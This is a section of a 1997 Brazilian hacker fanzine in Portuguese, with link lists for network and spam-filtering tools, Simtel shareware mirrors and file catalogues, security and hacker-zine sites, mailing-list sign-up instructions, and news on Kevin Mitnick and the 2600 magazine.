http://rs.internic.net/cgi-bin/whois          Whois

http://www.net.cmu.edu/bin/traceroute      Traceroute

http://www.anonymizer.com/                  Anonymizer

http://bogong.acci.com.au/~jon/agis/index.html   Lotsa Spam-Fighting Tools

http://www.netusa.net/~eli/filtering.html              Newsgroup Moderation Software

http://www.jazzie.com/ii/internet/procmail/        Infinite  Ink's Procmail

http://www.nepean.uws.edu.au:80/users/david/pe/blockmail.html   Blocking  Email

http://www.acm.uiuc.edu/workshops/procmail/                     Procmail Workshop

http://www.jazzie.com/ii/internet/mailbots.html       Mailbots

http://www.netusa.net/~eli/faqs/addressing.html     Email Addressing FAQ

http://www.jazzie.com/ii/faqs/archive/mail/filtering-faq          Mail Filtering FAQ

http://www-ucsee.eecs.berkeley.edu/~set/spam    More Email Filtering

ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail        Procmail FTP

http://www-users.informatik.rwth-aachen.de/~berg/archive/ procmail/   Procmail Archive

http://www.panix.com/e-spam.html                       Panix Email Resources

http://www.cis.ohio-state.edu/hypertext/faq/usenet/mail/ filtering-faq/faq.html   Another

Mail Filtering FAQ

http://kryten.eng.monash.edu.au/gspam.html     Help Deciphering Headers

http://digital.net/~gandalf/spamfaq.html         Header Deciphering


Páginas Jurídicas

Jus Navigandi (Pagina Juridica) --> http://www.geocities.com/Paris/1997


O PARAÍSO CHAMADO SIMTEL

Muitos não conhecem um verdadeiro paraíso, na forma de software shareware, gratuito ou coisa do gênero, disponível nos chamados "mirror" dos Simtelnet, um dos mais antigos repositórios de software na rede internet. A vantagem, comparada com grandes sites www como www.shareware.com ou www.download.com é que é relativamente fácil achar o que se que e até o que não se quer, nos índices.. Essa dica é meio de velha guarda, a maioria dos "velhos" fuçadores começou lá (eu, por exemplo). Mas quem não sabe, pode procurar que acha coisa interessante. Sem vírus.

| Australia/1 | Australia/2 | Austria | Brazil/1 | Brazil/2 | Bulgaria |
| Canada | Czech Republic | Finland | Germany/1 | Germany/2 | Hungary |
| Ireland | Israel | Italy | Korea | Norway | Romania | Slovakia |
| Slovenia | South Africa/1 | South Africa/2 | Switzerland |
| UK/1 | UK/2 | USA/1 | USA/2 | USA/3 | USA/4 |

Abaixo, o URL (igonorar o -------> na hora de digitar)

http://www.iniaccess.net.au/simtel.net/ ------>Australia/1

http://ftp.tas.gov.au/simtel.net/ ------>Australia/2

http://www.univie.ac.at/simtel.net/ ------>Austria

http://ftp.unicamp.br/simtel.net/ ------>Brazil/1

http://simtel.correionet.com.br/simtel.net/ ------>Brazil/2

http://www.eunet.bg/simtel.net/ ------>Bulgaria
http://mirror.direct.ca/simtel.net/ ------>Canada

http://pub.vse.cz/simtel.net/ ------>Czech Republic

http://ftp.funet.fi/mirrors/simtel.net/ ------>Finland

http://www.tu-chemnitz.de/HOME/fischer/simtel.net/ ------>Germany/1

http://www.ruhr-uni-bochum.de/simtel.net/ ------>Germany/2

http://www.simtel.iif.hu/ Hungary
http://www.hea.ie/simtel.net/ ------>Ireland

http://www.cs.huji.ac.il/simtel.net/ ------>Israel

http://serviceftp.flashnet.it/simtel.net/ ------>Italy

http://www.iWorld.net/simtel.net/ ------>Korea

http://archive.bitcon.no/simtel.net/ ------>Norway

http://www.sorostm.ro/simtel.net/ ------>Romania

http://ftp.uakom.sk/simtel.net/ ------>Slovakia
http://ftp.arnes.si/simtel.net/ ------>Slovenia

http://simtel.saix.net/ South Africa/1

http://simtelnet.is.co.za/ South Africa/2

http://sunsite.cnlab-switch.ch/simtel.net/ ------>Switzerland
http://ftp.globalnet.co.uk/simtel.net/ ------>UK/1

http://micros.hensa.ac.uk/+misc/simtel.net/ ------>UK/2

http://www.simtel.net/simtel.net/ ------>USA/1

http://oak.oakland.edu/simtel.net/ ------>USA/2

http://ftp.epix.net/simtel.net/ ------>USA/3

http://download.romt.com/simtel.net/ ------>USA/4

Para dar um exemplo do que se pode achar lá, vejamos a lista abaixo (escolhida do subdiretorio pub/simtel.net/msdos/info) Ah, sim. É preciso lembrar que estou pensando no pessoal que programa e quer aprender a mexer com computador ao escolher esta lista e não no pessoal que lê uma das internet-não-o-que da vida que só quer é brinquedinho..:

  asm9709h.zip  (970923)  65K  Sep 97 x86 Assembly Language FAQ, HTML format
  asm9709t.zip  (970923)  54K  Sep 97 x86 Assembly Language FAQ, text format
  asp804.zip    (961030) 381K  Association of ShareWare Professionals catalog
  aspdat71.zip  (970131)  60K  ASP membership list and info in DBF format
  author35.zip  (960407)  40K  List of MS-DOS PD & SW author e-mail addresses
  bbstip12.zip  (920808)   5K  Effective Shareware distribution via the BBS
  bestpr54.zip  (970212)  26K  Timo's choice of best MS-DOS/Win PD/FW/SW pgms
  bgi20.zip     (960522) 375K  Computer-based Internet tutorial for beginners
  biosdos.zip   (870813)  24K  List of BIOS error codes and what they mean
  bkache56.zip  (921203) 173K  Tutorial discusses back pain relief
  calfaq.zip    (960904)  20K  Frequently asked questions about calendars
  chap32.zip    (890715)  16K  Brief summary of copyright laws
  cnd7301.zip   (940103)  71K  ASP ShareWare authors quick-lookup catalog
  com3com4.txt  (910131)   5K  Notes on using COMM ports 3 and 4
  config.zip    (870124)  13K  How to setup CONFIG.SYS & AUTOEXEC.BAT
  copro16a.zip  (940925)  73K  Article on numeric coprocessors for PCs
  cpucmp14.zip  (930613)  12K  Perf. comparison 386DX/38600DX/486DLC/RapidCAD
  dcc9224.zip   (921002) 129K  List of over 1,000 computer clubs nationwide
  devdriv.zip   (851107)   3K  Tutorial on DOS device drivers
  diagtxt.zip   (861212)  10K  PC error diagnosis and memory error list
  disk-art.zip  (890609)  22K  Articles discussing disks by Steve Gibson
  dos32v4.zip   (860517)   4K  Patches to MS-DOS version 3.2
  dosfv206.zip  (960331)  56K  FAQ from comp.os.msdos.programmer newsgroup
  doshlp20.zip  (950624) 523K  DOSHelp v2.0: Basic DOS Commands Tutor
  dosimp10.zip  (910811) 253K  New DOS 5.0 tutorial, for new and oldtimers
  dosmnual.zip  (870222)  10K  DOS manual for beginners. Printable
  dosref33.zip  (940120) 282K  List of interrupts, memory locations, IO ports
  dostips.zip   (871214)  12K  Helpful hints on some DOS functions
  dostips1.zip  (851125)  65K  DOS tips from various magazines - part 1 of 6
  dostips2.zip  (851125)  58K  DOS tips from various magazines - part 2 of 6
  dostips3.zip  (851125)  45K  DOS tips from various magazines - part 3 of 6
  dostips4.zip  (860629)  59K  DOS tips from various magazines - part 4 of 6
  dostips5.zip  (871018)  60K  DOS tips from various magazines - part 5 of 6
  dostips6.zip  (870405)  43K  DOS tips from various magazines - part 6 of 6
  dostutor.zip  (860405)  94K  Learn MS-DOS - an interactive tutorial
  drdostip.zip  (920101)  62K  DR DOS 6.0 Tech Tips (1/2/92) from DRI BBS
  dtarev1.zip   (890118)  17K  Review of SpinRite & Disk Technician Advanced
  emailadr.zip  (930828)  20K  Baker's PC Industry E-mail address listing
  emailgui.zip  (910104)   6K  How to send E-Mail from one network to another
  ext_ram.zip   (890516)   5K  Good discusion of extended vs expanded RAM
  faqc9709.zip  (970928) 106K  Frequently Asked Questions of comp.compression
  faqclp.zip    (960226)  13K  Frequently Asked Questions of comp.lang.pascal
  faqclpb.zip   (960422)   8K  comp.lang.pascal.borland newsgroup Mini-FAQ
  ftp-list.zip  (970506) 410K  List of Internet sites with FTP & mail access
  ftp2uk23.zip  (920409)   8K  Unix scripts (2) for JANET FT-RELAY
  ftpgrep.zip   (940419)   1K  Perl script: Search ftp-list w/regular expr.
  gameport.inf  (900519)   3K  How to: read game port, schematic, hookup info
  geozone4.zip  (940830)   5K  Internet address two-letter country codes list
  glos2.zip     (900225)  63K  Glossary of Telecomputing terms
  inter55a.zip  (970928) 353K  Comprehensive list of interrupt calls, 1of4
  inter55b.zip  (970928) 353K  Comprehensive list of interrupt calls, 2of4
  inter55c.zip  (970928) 353K  Comprehensive list of interrupt calls, 3of4
  inter55d.zip  (970928) 506K  Comprehensive list of interrupt calls, 4of4
  inter55e.zip  (970928) 273K  Utility programs for interrupt list
  inter55f.zip  (970928) 214K  WinHelp hypertext conversion programs
  inthlp10.zip  (941111)  53K  Interrupt Helper: Viewer for interrupt list
  intshare.zip  (910805)   6K  Info on software interrupt-sharing protocol
  intwin54.zip  (970630) 4.2M  R.B.'s Interrupt List 54, Windows Help format
  intwin55.zip  (970930) 4.2M  Interrupt List 55, Windows Help format
  ip_hook.zip   (910326)  30K  Information on hooking up a PC to the Internet
  jarg300a.zip  (930728) 467K  Jargon-File 3.0.0 (Hacker's Dictionary), ASCII
  jarg300n.zip  (940303) 521K  Jargon-File 3.0.0 (Hacker's Dictionary), NG
  laptut58.zip  (921205) 228K  Laptop Tutorial, tips/tricks for laptop users
  maxcat.zip    (930910) 447K  Catalog of over 600 ShareWare programs
  mdive5a.zip   (960428)  30K  Heart attack risk assessment program
  mf2.zip       (901215)   2K  TSR shows program's memory usage while running
  mkdata.zip    (940914)  60K  1000 Internet email,telnet,ftp,gopher,WWW,URLs
  moder62.zip   (971018)  29K  List of MS-DOS FTP sites and their moderators
  modwks20.zip  (950107) 140K  Modem Workshop v2.0: Modem book on disk
  mrdos231.zip  (900105) 147K  DOS tutorial, beginner to hard disk, text/quiz
  muf17.zip     (960407)  64K  MicroSoft's Undocumented Features, Vol 1, No 7
  newlaw.zip    (901002)   3K  New copyright legislation, shareware problems
  nos2.zip      (970324) 957K  The Prophecies of Nostradamus v2.0
  nulcable.zip  (910118)   3K  How to make serial/parallel null modem cables
  packftp.zip   (941223) 450K  Anonymous FTP Sitelist conversion program
  pccdemo.zip   (931219) 577K  PC Complete disk magazine, issues 1 and 2
  pcgpe10.zip   (960628) 701K  The PC Games Programmers Encyclopedia 1.0
  pcl60a.zip    (960612) 223K  Pc-Learn: Beginners Computer Tutorial, 1 of 2
  pcl60b.zip    (960612) 200K  Pc-Learn: Beginners Computer Tutorial, 2 of 2
  psychek2.zip  (950527)  25K  Find out your management/personality style
  pwrwds23.zip  (960722) 227K  Power words: 4,500 wise and witty quotations
  redirect.zip  (900817)   9K  Advanced DOS tips on rerouting, piping, edlin
  relative.zip  (871201)   2K  Graphs relative speed of CPU
  res16sw.zip   (950503) 1.2M  Monitor repair procedure database. ShareWare
  rstutor.zip   (881104)  96K  Tutor for communications, serial interface
  rurarj.zip    (970711)  11K  RURARJ: Arj compression command set
  sut56.zip     (920705)  44K  Tutorial on how to use and enjoy Shareware
  tsfaqp38.zip  (971113) 123K  Common Turbo Pascal questions & Timo's answers
  useful35.zip  (940508)  26K  Useful MS-DOS programs at Simtel.Net and Garbo
  zen10.zip     (920630)  65K  Jun 1992 Zen and the Art of the Internet
  

Esta outra lista vem do subdiretório simtel.net/msdos/c (para quem quer aprender a linguagem C e fazer coisas interessantes):

    Filename      Date   Size  Description
  actlib17.zip  (931025)  86K  General purpose libs w/source for C/C++ pgmers
  advc11.zip    (870423)   9K  Thomas Hanlin's advanced 'C' routines. v.1.1
  asynlib2.zip  (910320)  17K  ASYNC communications library callable from 'C'
  bestl232.zip  (940912) 323K  Extensive C programmer's library (FreeWare)
  bin2c.zip     (960903)   9K  Convert a binary file to a C structure
  bituudec.c    (871224)   7K  MSDOS/VMS UUdecode fixes lost trailing spaces
  bltc127.zip   (961115) 220K  Bullet C/C++ 16-bit btree/DBF database engine
  bmp2cp11.zip  (970920)  23K  BMP file to C/C++ source file converter
  btoa.zip      (890124)   4K  'C' source for binary-to-ascii convert pgm
  bullet25.zip  (970702) 895K  Database engine for DOS32,Win32s,Win95,NT,OS/2
  c--final.zip  (961128) 640K  Sphinx C--: Compiler, examples & source
  c-eval.zip    (930423)  21K  C source to evaluate mathematical expressions
  c-flow.zip    (850624)  43K  Display flow of 'C' programs
  c4window.zip  (850806)  32K  Window routines for 'C' programs
  c60probs.zip  (900617)   6K  List of problems found with MS C v6.0
  cacoph10.zip  (940419)   7K  PC speaker music library for Turbo C and C++
  calendah.zip  (970124)   9K  ANSI C source for calendar calculations
  cbase102.zip  (910922) 267K  C routines for database applications, w/docs
  cbooks.zip    (890629)   9K  List of currently available C language books
  cc01.zip      (850828)   3K  'C' language functions and programs - 1 of 4
  cc02.zip      (860103)  65K  'C' language functions and programs - 2 of 4
  cc03.zip      (860103)  81K  'C' language functions and programs - 3 of 4
  cc04.zip      (851125)  78K  'C' language functions and programs - 4 of 4
  ccc1053a.zip  (891224)  26K  Complete C: learn/experiment w/OO systems,1of3
  ccc1053b.zip  (891224) 217K  Complete C: learn/experiment w/OO systems,2of3
  ccc1053c.zip  (891224) 293K  Complete C: learn/experiment w/OO systems,3of3
  ccdl151e.zip  (970704) 423K  32 bit C compiler for DOS/DPMI
  ccdl151l.zip  (970704) 443K  32 bit C compiler run time library
  ccdl151s.zip  (970704) 219K  32 bit C compiler sources
  ccompile.zip  (850605)  35K  Small 'C' compiler
  cdecl.zip     (871020)  11K  Decomposes 'C' language declarations
  cephes25.zip  (960913) 600K  Mathematical function library in C language
  cfgop110.zip  (950802)  48K  I/O for Windows type INI/CFG files. (C source)
  cfog102.zip   (950501)  52K  C source code obfuscator
  cgazv5n3.zip  (910507)  44K  Code from the C Gazette - Spring 1991 issue
  cl_7_bug.zip  (921008)  17K  Bug examples for Microsoft C-Compiler CL-7.00
  cm100exe.zip  (911115)  51K  MAKE for MSC/WIN SDK (exe and samples), 1of4
  cm100hlp.zip  (911115) 109K  MAKE for MSC/WIN SDK (QuickHelp), 2of4
  cm100txt.zip  (911115)  49K  MAKE for MSC/WIN SDK (Help: text format), 3of4
  cmake100.zip  (911115)   1K  MAKE for MSC/WIN SDK (description), 4of4
  cnews001.zip  (880622)   6K  Issue #1 'C' programmer's newsletter
  cnews002.zip  (880622)   5K  Issue #2 'C' programmer's newsletter
  cnews003.zip  (880205)  20K  Issue #3 'C' programmer's newsletter
  cnews004.zip  (880221)  42K  Issue #4 'C' programmer's newsletter
  cnews005.zip  (880307)  70K  Issue #5 'C' programmer's newsletter
  cnews006.zip  (880410)  28K  Issue #6 'C' programmer's newsletter
  cnews007.zip  (880529)   9K  Issue #7 'C' programmer's newsletter
  cnews008.zip  (880614)  57K  Issue #8 'C' programmer's newsletter
  cnews009.zip  (880717)  64K  Issue #9 'C' programmer's newsletter
  cnews010.zip  (880815)  49K  Issue #10 'C' programmer's newsletter
  cnews011.zip  (880909)  30K  Issue #11 'C' programmer's newsletter
  cnews012.zip  (881030)  12K  'C' programming & compiler review #12
  cnews013.zip  (881227)  37K  'C' Elec. Newsletter/Journal Vol 2 #13
  cnews014.zip  (890222)  62K  'C' Elec. Newsletter/Journal Vol 2 #14
  cnews015.zip  (890704)  24K  'C' Elec. Newsletter/Journal Vol 2 #15
  cnews016.zip  (890726)  56K  'C' Elec. Newsletter/Journal Vol 2 #16
  cnews017.zip  (890924)  16K  'C' Elec. Newsletter/Journal Vol 2 #17
  cnews018.zip  (891228)  39K  'C' Elec. Newsletter/Journal Vol 2 #18
  cnews019.zip  (900804)  28K  'C' Elec. Newsletter/Journal Vol 2 #19
  commasm.zip   (880713)   7K  Info for programming MS-DOS COMM ports
  configf.zip   (950430)   2K  Use Windows-like config files in C (w/src)
  conio.zip     (870608)   8K  Direct console I/O ASM routines for MicrosoftC
  consl10.zip   (950930) 122K  Console text output 16/32 bit C/C++ library
  consl11.zip   (960616)  94K  Console text output 16/32 bit C/C++ library
  cp14.zip      (920319)  25K  C code outliner (DDJ8808, tweaked for BC++2.0)
  cpc2.zip      (960121) 138K  CodePrint for C/C++ Version 2.02 Jan 1996
  cprot217.zip  (920614) 102K  C and C++ incremental prototypes extractor
  crc-c.zip     (870729)   4K  CRC routines for C
  crnchr22.zip  (930412)  67K  C Libs - FFT,Wavelet,Coherence,Filter,Regr.etc
  gencsrc.zip   (871120)  90K  Coronado's Generic 'C' tutor v2.0, (1 of 2)
  genctxt.zip   (871120) 105K  Coronado's Generic 'C' tutor v2.0, (2 of 2)
  mc302pc1.zip  (940318) 190K  MICRO-C PC 'C' compiler v3.02
  miracle.zip   (961205) 268K  Miracle C Compiler v1.7
  t2c.zip       (871201) 100K  Microsoft's Turbo Pascal to C translator
  zcc096.zip    (961104) 245K  Small C compiler, assembler and linker for DOS

Tem muita coisa em C, tentei selecionar acima, mas foi impossível..
imagine C++ entao..

  cptuts22.zip  (920119)  75K  Coronodo C++ Tutorial: Source examples, 1/2
  cptutt22.zip  (920119) 105K  Coronodo C++ Tutorial: Tutorial text files 2/2
  cslib211.zip  (970520) 793K  Database library for C++ developers
  dos_win1.zip  (940709) 186K  Windows-like GUI for DOS. BC++ 3.1 source code
  jptui4db.zip  (971115) 705K  Textual user interface for Borland C++ 4.x
  knowhow4.zip  (950120) 574K  Borland C++ SDK, DOS, source codes. GUI + more
  memman2c.zip  (950316)  45K  XMS/EMS/Virtual *Flat* Memory for C++/C
  newmat09.zip  (971013) 169K  C++ classes for matrix manipulation
  objeas3a.zip  (940829) 502K  Graphic/text user interface C++ library, 1of2
  objeas3b.zip  (940829) 238K  Graphic/text user interface C++ library, 2of2
  prnstr15.zip  (951023)  21K  Printer Stream Lib for Borland C++ programmers
  sdesg10b.zip  (950904)  77K  Sprite Designer for XLIB, c++ for sprite lib.
  serial_1.zip  (900513)   4K  C++ source code routines for serial ports
  tsr100je.zip  (930320)  70K  TSR class for Borland C++ (with source)

No simtel.net/msdos/sysutils pode-se por exemplo, encontrar emuladores de UNIX pra
DOS e outros baratos (todas as listas estao incompletas).


  autocmos.zip  (940922)   2K  CMOS memory read/write/auto repair utility
  dos94-01.zip  (961023) 490K  Windows 95 style utility menu for DOS
  fcii_2_1.zip  (891216)  81K  File Commando v2.1, a PC Tools clone, 1 of 3
  fcii_2_2.zip  (891216)  88K  File Commando v2.1, a PC Tools clone, 2 of 3
  fcii_2_3.zip  (891209)  73K  File Commando v2.1, a PC Tools clone, 3 of 3
  irqr.zip      (880422)   4K  Report status of IRQ channels,w/TP4 & MS C src
  is_con10.zip  (911220)   3K  Report if handle is associated with console
  jbalarm.zip   (910617)  22K  Alarm/reminder w/multiple sounds. Works w/WIN3
  jcfg100.zip   (961122)  18K  Assigns/swaps 'dummy' drive letters
  jobs32.zip    (890415)   7K  JOBS v3.20 - DOS shell/Disk manager, 1 of 3
  jobs32a1.zip  (890415) 125K  JOBS v3.20 - DOS shell/Disk manager, 2 of 3
  jobs32a2.zip  (890415) 127K  JOBS v3.20 - DOS shell/Disk manager, 3 of 3
  portfix.zip   (960312)  15K  Fixes SMC super I/O port lockup on 486/Pentium
  porttool.zip  (930112) 173K  16 Unix-like tools ported to MS-DOS
  sil2.zip      (851013)   6K  Silence PC speaker
  silence.zip   (851231)   3K  Turns PC speaker on and off
  siren.zip     (891205)   7K  Make siren sounds on PC speaker
  skey40.zip    (911223) 325K  Keystroke emulation and batch file utilities
  sysfs10.zip   (970620)  65K  System File Save: Backup/restore system files
  tstsr21.zip   (960810)  97K  TSR pgms noboot/reslock/timedown/timeup, etc.
  ud16_v33.zip  (971110) 4.2M  All 62+ Unix 32-bit utilities for MS-DOS
  undoc2eh.zip  (890108)   2K  Demo of undocumented interrupt service 2Eh
  uptime.zip    (910119)   2K  Time in days/hours/mins/secs since system boot
  uptimer.zip   (961022)   5K  System timer update from real-time clock
  util1.zip     (951024) 123K  A group of utilities for MS-DOS
  utils1.zip    (890727)   2K  Misc. utilities by E. Miller
  utl115.zip    (960405) 168K  Utilities with file viewer and printer support
  uxutl23a.zip  (960226) 238K  Unix-like utilities for DOS. Rel 2.3. 1of4
  uxutl23b.zip  (960226) 227K  Unix-like utilities for DOS. Rel 2.3. 2of4
  uxutl23c.zip  (960226) 221K  Unix-like utilities for DOS. Rel 2.3. 3of4
  uxutl23d.zip  (960226) 160K  Unix-like utilities for DOS. Rel 2.3. 4of4
  uznix120.zip  (960226) 332K  UZfulnix v1.20: Unix-like utilities for MS-DOS
  zutils02.zip  (951016)  52K  Collection of tiny utils HD/file related, lock

Por ultimo, claro que e' besteira reclamar pra mim que so' tem DOS aqui..
Existem tambem subdiretorios especificos para WIN95, Win 3.11 .. nao to dizendo
que as pessoas devam ir atras e procurar ai'. Mas pode valer a pena. É uma forma de 
garimpar informação. Basta ir atrás dos arquivos 00_index.txt da vida.
Até mail bomb e fake mail se encontra.

DICAS DE SOFTWARES

Um amigo, especialista em cracks e coisas do genero, me contou de um cara desesperado pra conseguir um jeito de usar estes softwares. Depois que li a descrição do que faz esses troços, achei que deveria juntar isso como dica. Afinal, nem sempre eu tenho tempo de conhecer tudo. O Zip Folders parece particularmente interessante.. não sei onde se consegue nenhum, talvez no www.shareware.com ou www.cdrom.com..

Wingroov 0.9ec executa midis

Vueprint 5.4 visualiza imagem e midis

Pica View 32 mostra telas em formato thumbs dentro do windows explorer...

Zip Folders 1.0 permite acessar pastas zipadas....

Thumbs 3.0 visualizador de imagens, com recursos de converter formatos


DICAS DE SITES MUITO, MAS MUITO INTERESSANTES..

http://www.alexa.com

http://www.iss.net/xforce/

http://www.altavista.magallanes.net/

http://www.datasoft.com.br/marconci/hack.htm

http://www.ntshop.net/security/exploits.htm

http://www.l0pht.com/

http://berlin.ccc.de/

http://oliver.efri.hr/~crv/security/bugs/NT/nt.html

http://www.ntmag.com/

http://www.ugu.com

http://lebeau.home.ml.org

http://www.savilltech.com/ntfaq.html

http://microlink.com.br/~buick/dragons.htm

http://www.xs4all.nl/~jojo/jogos

http://premium.microsoft.com/support/kb/articles/q150/7/34.asp

http://www.dicas-l.unicamp.br                     <---- Muiiito interessante


Maquinas de busca em espanhol

Olé Ozú El otro Ozú Whom Where El Buscón El buscador mágico Buscador de Archivos

http://www.ole.es  Olé

http://www.ozu.com  Ozú

http://www.ozu.es    El otro Ozú

http://www.spanish.whomwhere.com   Whom Where

http://194.51.86.22   El Buscón

http://www.ctv.es/USERS/amartin       El buscador mágico

http://www.filez.com/espanol2.html      Buscador de Archivos

Um acontecimento contra a liberdade de opiniao e expressao na Espanha

HTTP://ELCASO.VESATEC.COM/#prensa


Hacker-zines brasileiros

Estão saindo uma pá de novos zines. Acho isso legal pacas, já que um dos motivos que criei o Barata Elétrica é exatamente estimular o pessoal a fazer coisa ainda melhor. O chato é que alguns estão simplesmente "puxando" e "copiando" material de outros, algumas vezes até assumindo como se fossem autores da matéria, isso quando não inventam de "encher linguiça" com lista de serial numbers. Outra coisa que está se tornando meio que hábito é fazer página na Geocities, que está caçando e apagando páginas de todo mundo. Todo mundo, literalmente. Se brincar, minha página não está lá.  A Geocities tirou.  Alguns zines são ruins, não tem outra palavra. Outros, dá pra ver que o cara ainda pode fazer algo legal.  E tem outros que o cara teve uma ótima idéia. Não vou falar quais. O duro é sobreviver e continuar. Tem zine que é famosíssimo. Mas não passou do número 2 em mais de 6 meses. Aliás, tem vários nessa situação.  A lista abaixo não define nenhum critério de escolha e é provavel que tais páginas já tenham sumido do mapa. Fica o registro histórico, provavelmente vão renascer em algum lugar.. Ah, sim, ia me esquecendo: como tem zineiro aí que resolveu que meu fanzine não presta, vou fazer a vontade dele e não sujar seu nome colocando ele aqui.

http://www.geocities.com/Paris/Metro/6720/       Conscience

http://www.geocities.com/Broadway/6721/index.html    Rato.br

http://www.geocities.com/SiliconValley/Way/8650/policy.html    Policy - segurança em Unix

http://www.geocities.com/Paris/Metro/6720/     Ezine Conscience

http://www.complex-x.net/kaotik/ptzine/index.htm      Fanzine de Portugal


Nova lista Hackers

Eu descobri um lugar onde qualquer um pode fazer sua própria lista e criei outra lista hackers, desta vez com o nome de hackers.braz

Não sei se vai ter o mesmo sucesso da anterior, que estava hospedada na esquina-das-listas, que todo mundo sabe, já era. Pra se inscrever, vá até o url:   http://www.coollist.com   e se inscreva lá na lista  hackers.braz (não confundir com a lista hackers, que também existe, tém alto volume de correspondência, mas tá cheia de wannabe e lammer, além de ser em inglês).

Ao se inscrever, voce irá receber um email igual a este (mais ou menos) pedindo pra você mandar um reply de confirmação:

> Date:
>         Thu, 25 Sep 1997 20:33:01 -0400 (EDT)
>     To:
>         fulano@rocketmail.com
>   From:
>         subscribe@coollist.com Add to Address Book
>  Subject:
>         Confirmation of Subscription
> 
> 
> We have recently been requested by you to subscribe to this
> 
>                 List: 
> 
> Please confirm that you want to subscribe by replying to this message.
> 
> If this subscription is unsolicited, simply delete this message.
> 
> Thank you.
> 
> ----------------------------------------------------
> Get a FREE Mailing List at http://208.141.98.157/
> 
> 
> 

Para se desinscrever, manda email para unsubscribe@coollist.com  
A resposta deve ser:

> Date:
>         Fri, 3 Oct 1997 23:48:09 -0400 (EDT)
>     To:
>         fulano@rocketmail.com
>   From:
>         unsubscribe@coollist.com Add to Address Book
>  Subject:
>         Unsubscribe Request
> 
> 
> To unsubscribe from a Coollist Mailing List, just reply
> to this message and enter the name or the email address of
> your list between the square brackets:
> 
>         List: [   ]
> 
> eg The address of the mailing list you post to
> 
> Then enter an "X" in the box below:
> 
>         [ ] UNSUBSCRIBE
> 
> You will be unsubscribed instantly. Thank you.
> --------------------------------------------------------
> Get your FREE Mailing List. http://www.coollist.com
> 
> 
> 
>             
O que rola é que a pessoa querendo se desinscrever 
coloca o nome da lista onde quer se desinscrever, tal como:

>         List: [hackers.braz   ]
> 
> eg The address of the mailing list you post to
> 
> Then enter an "X" in the box below:
> 
>         [X] UNSUBSCRIBE

Tudo isso e manda o reply de volta. Aí você está fora
da lista.


A confirmação de inscrição ou des-inscrição vem depois, como
por exemplo:

> Date:
>         Sun, 28 Sep 1997 08:56:17 -0400 (EDT)
>     To:
>         Fulano de Tal 
>   From:
>         hackers.braz@coollist.com Add to Address Book
>  Subject:
>         You have been subscribed
> 
> 
> Note: This is an automated Response
> 
> Congratulations! You have been subscribed to the hackers.braz list.
> To post to this list, just email your posting to
> "hackers.braz@coollist.com"
> 
> To unsubscribe from this list, just send a blank email to:
>         unsubscribe@coollist.com
> 
> If you did not ask to be subscribed, please send this email to
> nospam@coollist.com
> 
> If you encounter any problems at all, email support@coollist.com
> 
> Thank you and Have fun!
> ------------------------------------------------------
> Get your FREE Mailing List. http://www.coollist.com
> 
> 

Detalhe importante: 
Esta lista pode ou não se tornar uma sucessora da lista hackers. Tudo
depende de quem estiver afim de se inscrever ou não. Eu considerava
a lista hackers como um ponto de encontro, onde todo mundo podia ter
uma chance de se comunicar. Espero que o pessoal entre nessa.

OUTRA LISTA HACKER(?)

Essa contribuição veio de um leitor:

Majordomo@listserv.pegasus.com.br

subscribe hacker seu@email


LISTA CIBERCULTURA

Esta é uma lista criada por André Lemos, Prof da Faculdade de Comunicação da Universidade
Federal da Bahia e tem como base a discussão de temas ligados a cultura Cyber (que não é 
exatamente a ver com a cultura hacker, é bom notar). Se você tiver interesse em discutir
novas tecnologias, lances de cabeça, etc, tudo bem. Pedir cracks pra joguinho, perguntar
como se faz para atravessar uma FIREWALL, como se tornar um hacker, isso daí não tem 
absolutamente NADA a ver com a lista. Se voce tem alguma idéia sobre cultura cyber, esse
é o lugar para entender, tentar entender ou discutir..

Para se inscrever:

Enviar correio eletronico para listproc@ufba.br com o seguinte conteúdo:

subscribe cibercultura  Seu-nome-fulano 

Para se desinscrever:

Mesmo correio eletrônico, outro conteúdo:

unsubscribe cibercultura 

Para ver informações:

help, info, sei lá.. o listproc devolve um arquivo em ingles com o funcionamento
da coisa toda, se eu estiver errado.


Para contribuir para a lista:

Correio eletronico para cibercultura@ufba.br


MITNICK NEWS To: cypherpunks@toad.com Subject: Mitnick Rings Bell 6 de novembro 1997, notícia da Digital Cellular Report: O governo americano adota linha dura com Mitnick. Hacker americano pede ajuda. Um "hacker" americano - Kevin David Mitnick - preencheu um pedido para ajuda financeira para lutar por sua defesa, através de seu advogado, Donald C Randolph de Santa Monica, EUA. Através de Randolph, Mitnick está clamando que o governo americano está procurando fazer dele um exemplo pela possessão de códigos de acesso não-autorizados a (fone) celular. O caso é particularmente importante para o mercado norte-americano, onde fones celulares analógicos, ao invés de digitais, são norma. Em uma das mais interessantes declarações, Mitnick afirma ter sido mantido em solitária por 23 horas diárias, nu em uma cela de ar condicionado congelante por 8 meses e mandado para o chuveiro acorrentado. Talvez o aspecto mais intrigante em todo o caso é o fato de que enquanto o governo americano nunca procurou provar que Mitnick "faturou" de suas atividades de "hacker" - embora certamente pudesse ter feito tal coisa através da "venda" de tempo online para terceiros. Ao invés disso afirmam que ele causou perdas de 80 milhões. Kevin certamente parece estar pagando o preço por feitos nefastos, tendo já gastado próximo de dois anos em custódia, em cujo tempo foi proibido de fazer acesso a comunicações sem fio, software ou hardware. É difícil saber exatamente qual lado está mais paranóico, já que Mitnick está afirmando que sua sina é parte de um complô do governo americano para afastar o escrutínio que concerne a regulamentação tanto das telecomunicações como da internet. http://www.kevinmitnick.com/


2600 - Hacker Quaterly - à beira do abismo

A última desgraça que está rolando no pedaço é a notícia de que o mais famoso fanzine de Hackers, o 2600-Hacker Quaterly, está a beira da falência. A distribuidora do fanzine, (fazer o zine é uma coisa, vender por todo o país, é tarefa da distribuidora) brincou demais com a grana dos caras e ... entraram em concordata ou coisa do gênero. Os caras que assumiram a empresa depois também brincaram um pouco e parece que a coisa lá vai mal. O Goldstein não entrou em concordata, acha que dá pra levar  a empresa adiante, mas tá russa, a coisa. Se piorar, vai ser o terceiro fanzine famoso a sair do ar, junto com o Hack-Tic e o Vírus Report. Por essas e outras que não transformei o Barata Elétrica num evento comercial.. ou mesmo criar uma revista com nome real, menos maldito. Quem quiser maiores informações, dá uma olhada no www.2600.com  . Minha opinião é que o cara vai se safar dessa, o difícil vai ser o pessoal fazer assinaturas por uns tempos. A próxima edição vai atrasar, isso tá avisado na página.


Encontros de Hackers em São Paulo, Rio e Belo Horizonte:

